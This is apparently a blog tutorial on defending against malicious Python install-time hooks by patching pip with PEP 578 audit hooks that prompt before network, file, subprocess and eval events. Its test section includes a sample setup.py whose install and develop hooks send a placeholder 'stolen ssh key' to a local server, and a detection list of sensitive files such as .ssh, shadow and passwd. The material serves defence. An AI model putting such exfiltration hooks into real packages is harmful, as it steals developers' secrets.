Several supply chain attacks, notably in the Python and Javascript ecosystem, exploit install time hooks to perform malicious activity 1 2. Install time hooks allow running arbitray code before or after package installation. Since attacks utilizing install time hooks do not involve developers actually using the package, it makes them an attractive method for attackers. The most common behaviour observed in known supply chain attacks is data exflitration 1 2.. Common targets include ssh keys, passwords, dotfiles, environment variables etc.
A bit about how pip works
Python packages are distributed in two primary formats: wheel .whl
and source .tar.gz
. Many packages offer both formats, so pip prefers .whl
artifacts over .tar.gz
unless you specify --no-binary
during pip install
.
A package contains package metadata such as author, version, name, dependencies etc. There are two primary ways to declare package metadata. pyproject.toml
and setup.py
. pip
prefers pyproject.toml
over setup.py
as pyproject.toml
is considered setup.py
’s successor.
Poetry, for example, offers both setup.py
and pyproject.toml
when running poetry build
. In this case, pip
would prioritize pyproject.toml
.
If you’re distributing your package as a wheel, you cannot run install hooks 3. However, if you’re distributing it as a tarball, you can - given that you have a setup.py
and not a pyproject.toml
.
Confusing, right? Don’t worry, just follow along!
Since setup.py
is run during building and installation, it permits execution of arbitrary python code.
There may be legitimate reasons to conduct network and or file system actions during or post installation, but since this is the most common attack vector, let’s explore how can we reduce the attack surface using audit hooks!
Test Drive
Let’s setup an audit hook to capture socket.connect
and socket.getaddrinfo
1# vim hook.py
2import sys
3
4
5def hook(event, args):
6 if event == "socket.getaddrinfo":
7 print("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]))
8 elif event == "socket.connect":
9 print("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]))
10 else:
11 return
12 data = input("y(es) or n(o): ")
13 if data != "y":
14 sys.exit(1)
15
16sys.addaudithook(hook)
# run http sever
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
1# vim test.py
2import hook
3import requests
4
5r = requests.get("http://0.0.0.0:8000")
test.py
$ pip install requests
$ python3 test.py
REQUESTING socket.getaddrinfo 0.0.0.0:8000
y(es) or n(o): y
REQUESTING socket.connect 0.0.0.0:8000
y(es) or n(o): y
Your http server should show:
127.0.0.1 - - [15/Jun/2023 14:33:56] "GET / HTTP/1.1" 200 -
Try writing n
and notice that the server reports no requests.
Great! Now let’s introduce this hook into pip
.
We need to insert the audit hook before we run the package’s setup.py
.
We also need to modify the audit hook slightly as setup.py
is run as a subprocess.
1# pip/_internal/utils/setuptools_build.py
2import sys
3import textwrap
4from typing import List, Optional, Sequence
5
6
7AUDIT_HOOK = textwrap.dedent("""'''
8def hook(event, args):
9 if event == "socket.getaddrinfo":
10 sys.stdout.write("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]) + os.linesep)
11 sys.stdout.flush()
12 elif event == "socket.connect":
13 sys.stdout.write("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]) + os.linesep)
14 sys.stdout.flush()
15 # TODO: filter anything in venv
16 # we can filter for anything from here
17 # https://peps.python.org/pep-0578/#suggested-audit-hook-locations
18 else:
19 return
20 data = input()
21 if data != "y":
22 sys.exit(1)
23
24sys.addaudithook(hook)
25'''""")
26# Shim to wrap setup.py invocation with setuptools
27# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on
28# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").
29_SETUPTOOLS_SHIM = textwrap.dedent(
30 """
31 exec(compile('''
32 # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py
33 #
34 # - It imports setuptools before invoking setup.py, to enable projects that directly
35 # import from `distutils.core` to work with newer packaging standards.
36 # - It provides a clear error message when setuptools is not installed.
37 # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so
38 # setuptools doesn't think the script is `-c`. This avoids the following warning:
39 # manifest_maker: standard file '-c' not found".
40 # - It generates a shim setup.py, for handling setup.cfg-only projects.
41 import os, sys, tokenize
42 try:
43 import setuptools
44 except ImportError as error:
45 print(
46 "ERROR: Can not execute `setup.py` since setuptools is not available in "
47 "the build environment.",
48 file=sys.stderr,
49 )
50 sys.exit(1)
51
52 __file__ = %r
53 sys.argv[0] = __file__
54
55 if os.path.exists(__file__):
56 filename = __file__
57 with tokenize.open(__file__) as f:
58 setup_py_code = f.read()
59 else:
60 filename = "<auto-generated setuptools caller>"
61 setup_py_code = "from setuptools import setup; setup()"
62 # setup audit hooks here
63 %s
64 exec(compile(setup_py_code, filename, "exec"))
65 ''' % ({!r}, {}), "<pip-setuptools-caller>", "exec"))
66 """
67).rstrip()
68
69
70def make_setuptools_shim_args(
71 setup_py_path: str,
72 global_options: Optional[Sequence[str]] = None,
73 no_user_config: bool = False,
74 unbuffered_output: bool = False,
75) -> List[str]:
76 """
77 Get setuptools command arguments with shim wrapped setup file invocation.
78
79 :param setup_py_path: The path to setup.py to be wrapped.
80 :param global_options: Additional global options.
81 :param no_user_config: If True, disables personal user configuration.
82 :param unbuffered_output: If True, adds the unbuffered switch to the
83 argument list.
84 """
85 args = [sys.executable]
86 if unbuffered_output:
87 args += ["-u"]
88 args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path, AUDIT_HOOK)]
89 if global_options:
90 args += global_options
91 if no_user_config:
92 args += ["--no-user-cfg"]
93 return args
94
95
96def make_setuptools_bdist_wheel_args(
97 setup_py_path: str,
98 global_options: Sequence[str],
99 build_options: Sequence[str],
100 destination_dir: str,
101) -> List[str]:
102 # NOTE: Eventually, we'd want to also -S to the flags here, when we're
103 # isolating. Currently, it breaks Python in virtualenvs, because it
104 # relies on site.py to find parts of the standard library outside the
105 # virtualenv.
106 args = make_setuptools_shim_args(
107 setup_py_path, global_options=global_options, unbuffered_output=True
108 )
109 args += ["bdist_wheel", "-d", destination_dir]
110 args += build_options
111 return args
112
113
114def make_setuptools_clean_args(
115 setup_py_path: str,
116 global_options: Sequence[str],
117) -> List[str]:
118 args = make_setuptools_shim_args(
119 setup_py_path, global_options=global_options, unbuffered_output=True
120 )
121 args += ["clean", "--all"]
122 return args
123
124
125def make_setuptools_develop_args(
126 setup_py_path: str,
127 *,
128 global_options: Sequence[str],
129 no_user_config: bool,
130 prefix: Optional[str],
131 home: Optional[str],
132 use_user_site: bool,
133) -> List[str]:
134 assert not (use_user_site and prefix)
135
136 args = make_setuptools_shim_args(
137 setup_py_path,
138 global_options=global_options,
139 no_user_config=no_user_config,
140 )
141
142 args += ["develop", "--no-deps"]
143
144 if prefix:
145 args += ["--prefix", prefix]
146 if home is not None:
147 args += ["--install-dir", home]
148
149 if use_user_site:
150 args += ["--user", "--prefix="]
151
152 return args
153
154
155def make_setuptools_egg_info_args(
156 setup_py_path: str,
157 egg_info_dir: Optional[str],
158 no_user_config: bool,
159) -> List[str]:
160 args = make_setuptools_shim_args(setup_py_path, no_user_config=no_user_config)
161
162 args += ["egg_info"]
163
164 if egg_info_dir:
165 args += ["--egg-base", egg_info_dir]
166
167 return args
Since this code is called in a subprocess, we need to relay the user input (either y or n) from the main process to the subprocess.
1# pip/_internal/utils/subprocess.py
2import logging
3import os
4import shlex
5import subprocess
6from typing import (
7 TYPE_CHECKING,
8 Any,
9 Callable,
10 Iterable,
11 List,
12 Mapping,
13 Optional,
14 Union,
15)
16
17from pip._vendor.rich.markup import escape
18
19from pip._internal.cli.spinners import SpinnerInterface, open_spinner
20from pip._internal.exceptions import InstallationSubprocessError
21from pip._internal.utils.logging import VERBOSE, subprocess_logger
22from pip._internal.utils.misc import HiddenText
23
24if TYPE_CHECKING:
25 # Literal was introduced in Python 3.8.
26 #
27 # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.
28 from typing import Literal
29
30CommandArgs = List[Union[str, HiddenText]]
31
32
33def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:
34 """
35 Create a CommandArgs object.
36 """
37 command_args: CommandArgs = []
38 for arg in args:
39 # Check for list instead of CommandArgs since CommandArgs is
40 # only known during type-checking.
41 if isinstance(arg, list):
42 command_args.extend(arg)
43 else:
44 # Otherwise, arg is str or HiddenText.
45 command_args.append(arg)
46
47 return command_args
48
49
50def format_command_args(args: Union[List[str], CommandArgs]) -> str:
51 """
52 Format command arguments for display.
53 """
54 # For HiddenText arguments, display the redacted form by calling str().
55 # Also, we don't apply str() to arguments that aren't HiddenText since
56 # this can trigger a UnicodeDecodeError in Python 2 if the argument
57 # has type unicode and includes a non-ascii character. (The type
58 # checker doesn't ensure the annotations are correct in all cases.)
59 return " ".join(
60 shlex.quote(str(arg)) if isinstance(arg, HiddenText) else shlex.quote(arg)
61 for arg in args
62 )
63
64
65def reveal_command_args(args: Union[List[str], CommandArgs]) -> List[str]:
66 """
67 Return the arguments in their raw, unredacted form.
68 """
69 return [arg.secret if isinstance(arg, HiddenText) else arg for arg in args]
70
71
72def call_subprocess(
73 cmd: Union[List[str], CommandArgs],
74 show_stdout: bool = False,
75 cwd: Optional[str] = None,
76 on_returncode: 'Literal["raise", "warn", "ignore"]' = "raise",
77 extra_ok_returncodes: Optional[Iterable[int]] = None,
78 extra_environ: Optional[Mapping[str, Any]] = None,
79 unset_environ: Optional[Iterable[str]] = None,
80 spinner: Optional[SpinnerInterface] = None,
81 log_failed_cmd: Optional[bool] = True,
82 stdout_only: Optional[bool] = False,
83 *,
84 command_desc: str,
85) -> str:
86 """
87 Args:
88 show_stdout: if true, use INFO to log the subprocess's stderr and
89 stdout streams. Otherwise, use DEBUG. Defaults to False.
90 extra_ok_returncodes: an iterable of integer return codes that are
91 acceptable, in addition to 0. Defaults to None, which means [].
92 unset_environ: an iterable of environment variable names to unset
93 prior to calling subprocess.Popen().
94 log_failed_cmd: if false, failed commands are not logged, only raised.
95 stdout_only: if true, return only stdout, else return both. When true,
96 logging of both stdout and stderr occurs when the subprocess has
97 terminated, else logging occurs as subprocess output is produced.
98 """
99 if extra_ok_returncodes is None:
100 extra_ok_returncodes = []
101 if unset_environ is None:
102 unset_environ = []
103 # Most places in pip use show_stdout=False. What this means is--
104 #
105 # - We connect the child's output (combined stderr and stdout) to a
106 # single pipe, which we read.
107 # - We log this output to stderr at DEBUG level as it is received.
108 # - If DEBUG logging isn't enabled (e.g. if --verbose logging wasn't
109 # requested), then we show a spinner so the user can still see the
110 # subprocess is in progress.
111 # - If the subprocess exits with an error, we log the output to stderr
112 # at ERROR level if it hasn't already been displayed to the console
113 # (e.g. if --verbose logging wasn't enabled). This way we don't log
114 # the output to the console twice.
115 #
116 # If show_stdout=True, then the above is still done, but with DEBUG
117 # replaced by INFO.
118 if show_stdout:
119 # Then log the subprocess output at INFO level.
120 log_subprocess: Callable[..., None] = subprocess_logger.info
121 used_level = logging.INFO
122 else:
123 # Then log the subprocess output using VERBOSE. This also ensures
124 # it will be logged to the log file (aka user_log), if enabled.
125 log_subprocess = subprocess_logger.verbose
126 used_level = VERBOSE
127
128 # Whether the subprocess will be visible in the console.
129 showing_subprocess = subprocess_logger.getEffectiveLevel() <= used_level
130
131 # Only use the spinner if we're not showing the subprocess output
132 # and we have a spinner.
133 use_spinner = not showing_subprocess and spinner is not None
134
135 log_subprocess("Running command %s", command_desc)
136 env = os.environ.copy()
137 if extra_environ:
138 env.update(extra_environ)
139 for name in unset_environ:
140 env.pop(name, None)
141 try:
142 proc = subprocess.Popen(
143 # Convert HiddenText objects to the underlying str.
144 reveal_command_args(cmd),
145 stdin=subprocess.PIPE,
146 stdout=subprocess.PIPE,
147 stderr=subprocess.STDOUT if not stdout_only else subprocess.PIPE,
148 cwd=cwd,
149 env=env,
150 errors="backslashreplace",
151 )
152 except Exception as exc:
153 if log_failed_cmd:
154 subprocess_logger.critical(
155 "Error %s while executing command %s",
156 exc,
157 command_desc,
158 )
159 raise
160 all_output = []
161 if not stdout_only:
162 assert proc.stdout
163 assert proc.stdin
164 # In this mode, stdout and stderr are in the same pipe.
165 while True:
166 line: str = proc.stdout.readline()
167 if not line:
168 break
169 if 'REQUESTING' in line:
170 line_without_newline = line.replace('\n', '')
171 proc.stdout.flush()
172 data = input(f'Package is {line_without_newline}. (y)es or (n)o\n')
173 proc.stdin.write(data+'\n')
174 proc.stdin.flush()
175 else:
176 # Show the line immediately.
177 log_subprocess(line)
178 line = line.rstrip()
179 all_output.append(line + "\n")
180
181 try:
182 proc.wait()
183 finally:
184 if proc.stdout:
185 proc.stdout.close()
186 proc.stdin.close()
187 output = "".join(all_output)
188 else:
189 # In this mode, stdout and stderr are in different pipes.
190 # We must use communicate() which is the only safe way to read both.
191 out, err = proc.communicate()
192 # log line by line to preserve pip log indenting
193 for out_line in out.splitlines():
194 log_subprocess(out_line)
195 all_output.append(out)
196 for err_line in err.splitlines():
197 log_subprocess(err_line)
198 all_output.append(err)
199 output = out
200
201 proc_had_error = proc.returncode and proc.returncode not in extra_ok_returncodes
202 if use_spinner:
203 assert spinner
204 if proc_had_error:
205 spinner.finish("error")
206 else:
207 spinner.finish("done")
208 if proc_had_error:
209 if on_returncode == "raise":
210 error = InstallationSubprocessError(
211 command_description=command_desc,
212 exit_code=proc.returncode,
213 output_lines=all_output if not showing_subprocess else None,
214 )
215 if log_failed_cmd:
216 subprocess_logger.error("[present-rich] %s", error)
217 subprocess_logger.verbose(
218 "[bold magenta]full command[/]: [blue]%s[/]",
219 escape(format_command_args(cmd)),
220 extra={"markup": True},
221 )
222 subprocess_logger.verbose(
223 "[bold magenta]cwd[/]: %s",
224 escape(cwd or "[inherit]"),
225 extra={"markup": True},
226 )
227
228 raise error
229 elif on_returncode == "warn":
230 subprocess_logger.warning(
231 'Command "%s" had error code %s in %s',
232 command_desc,
233 proc.returncode,
234 cwd,
235 )
236 elif on_returncode == "ignore":
237 pass
238 else:
239 raise ValueError(f"Invalid value: on_returncode={on_returncode!r}")
240 return output
241
242
243def runner_with_spinner_message(message: str) -> Callable[..., None]:
244 """Provide a subprocess_runner that shows a spinner message.
245
246 Intended for use with for BuildBackendHookCaller. Thus, the runner has
247 an API that matches what's expected by BuildBackendHookCaller.subprocess_runner.
248 """
249
250 def runner(
251 cmd: List[str],
252 cwd: Optional[str] = None,
253 extra_environ: Optional[Mapping[str, Any]] = None,
254 ) -> None:
255 with open_spinner(message) as spinner:
256 call_subprocess(
257 cmd,
258 command_desc=message,
259 cwd=cwd,
260 extra_environ=extra_environ,
261 spinner=spinner,
262 )
263
264 return runner
Testing our hook:
Let’s create a fake package to test it out:
$ mkdir test
$ vim test/setup.py
# test/setup.py
from setuptools import setup
import requests # you can use socket too
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
setup()
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
Preparing metadata (setup.py) ...
Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o
Another method:
$ vim test/setup.py
# test/setup.py
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.develop import develop
import requests # you can use socket too
class AfterInstall(install):
def run(self):
install.run(self)
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
class AfterDevelop(develop):
def run(self):
develop.run(self)
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
setup(cmdclass={
'install': AfterInstall,
'develop': AfterDevelop})
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
Preparing metadata (setup.py) ...
done
Building wheels for collected packages: UNKNOWN
Building wheel for UNKNOWN (setup.py)
... Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o
Yes! It works!
Additional checks:
1def hook(event, args):
2 if event == "socket.getaddrinfo":
3 sys.stdout.write("REQUESTING " + event + " "+ str(args[0])+":"+str(args[1]) + os.linesep)
4 sys.stdout.flush()
5 elif event == "socket.connect":
6 sys.stdout.write("REQUESTING " + event + " "+ str(args[1][0])+":"+str(args[1][1]) + os.linesep)
7 sys.stdout.flush()
8 elif event == "open":
9 arg = str(args[0])
10 if ".ssh" in arg or "shadow" in arg or "passwd" in arg or ".config" in arg or '.env' in arg:
11 sys.stdout.write("REQUESTING "+ event +" "+ arg + os.linesep)
12 sys.stdout.flush()
13 else:
14 return
15 elif event == "os.system":
16 sys.stdout.write("REQUESTING: " + event+ " " + args[0].decode('utf-8') + os.linesep)
17 sys.stdout.flush()
18 elif event == "subprocess.call":
19 sys.stdout.write("REQUESTING: " + event+ " " + str(args[0]) + os.linesep)
20 sys.stdout.flush()
21 elif event == "subprocess.run":
22 sys.stdout.write("REQUESTING: " + event+ " " + str(args[0]) + os.linesep)
23 sys.stdout.flush()
24 elif event == "eval":
25 sys.stdout.write("REQUESTING: execution of arbitrary code" + os.linesep)
26 sys.stdout.flush()
27 else:
28 return
29 data = input()
30 if data != "y":
31 sys.exit(1)
open
as pip opens various files when building and installing.
Conclusion:
Audit hooks are NOT foolproof and can be bypassed by an advanced adversary. See the PEP for more info. Despite that, this implementation provides a simple and effective defence against the abuse of install time hooks.
See the full implementation
Use it:
$ python3 -m venv venv
$ cd venv/lib/python3.<yourversion>/site-packages/
$ mv pip old_pip
$ wget https://github.com/R9295/pip/archive/refs/heads/main.zip
$ unzip main.zip
$ mv pip-main pip
$ cd pip
$ mv src/pip/* .
$ cd /to/our/test/package
$ pip install test.tar.gz
# it should work!